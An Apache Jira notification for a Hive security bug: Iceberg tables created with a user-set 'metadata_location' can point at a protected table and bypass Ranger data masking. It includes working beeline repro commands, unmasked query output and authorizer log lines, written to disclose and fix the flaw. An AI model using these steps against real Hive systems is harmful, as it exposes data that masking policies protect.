[ 
https://issues.apache.org/jira/browse/HIVE-27713?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Janos Kovacs reassigned HIVE-27713:
-----------------------------------

    Assignee: Ayush Saxena  (was: Ayush Saxena)

> Iceberg: metadata location overrides can cause data breach
> ----------------------------------------------------------
>
>                 Key: HIVE-27713
>                 URL: https://issues.apache.org/jira/browse/HIVE-27713
>             Project: Hive
>          Issue Type: Bug
>          Components: Authorization, Iceberg integration
>    Affects Versions: 4.0.0-alpha-2
>            Reporter: Janos Kovacs
>            Assignee: Ayush Saxena
>            Priority: Major
>              Labels: check
>
> Set to bug/blocker instead of enhancement due to its security related nature, 
> Hive4 should not be released w/o fix for this. Please reset if needed.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * An end-user can only access the masked form of the sensitive data as 
> expected...
>  * The users also have privilege to create new tables in their own sandbox 
> databases - let's assume this is the `default.trojanhorse` table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> non-masked leading to a possible data breach.
>  * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user 
> direct file-system access needs
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see 
> this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> |         icebergsecured.txt         |     icebergsecured.secret      |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +------------------------------------+--------------------------------+
> {noformat}
>  * Now let the user to create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>  beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep 
> metadata_location  |grep -v previous_metadata_location | awk '{print $5}')
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorse;
> CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED 
> BY ICEBERG
> TBLPROPERTIES (
>   'metadata_location'='${SECURED_META_LOCATION}');
> SELECT * FROM default.trojanhorse;
> "
> +------------------------------------+-----------------------------------+
> |          trojanhorse.txt           |        trojanhorse.secret         |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> +------------------------------------+-----------------------------------+
> {noformat}
>  
> Currently - after HIVE-26707 - the rwstorage authorization only has either 
> the dummy path or the explicit path set for uri:  
> {noformat}
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
>  
> {noformat}
> With custom location it's even not passed to the authorizer:
> {noformat}
> 2023-05-17 19:38:51,867 INFO  org.apache.hadoop.hive.ql.Driver: 
> [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: 
> Compiling 
> command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): 
> CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED 
> BY ICEBERG 
> TBLPROPERTIES (
>   
> 'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json')
> ...
> 2023-05-17 19:38:51,898 DEBUG 
> org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: 
> [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: 
> Iceberg storage handler authorization URI 
> iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json
> {noformat}
>  
> Mandatory changes required for securing tables:
>  * Custom location needs to be passed to the Authorizer
> Changes required for usability - e.g. to eliminate the need to require a 
> policy for each tables:
>  * Default location needs to be calculated based on warehouse/database def. 
> location
>  * CREATE/ALTER with default locations should not involve RWStorage 
> Authorization or should be handled a special way in the Authorizer. 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to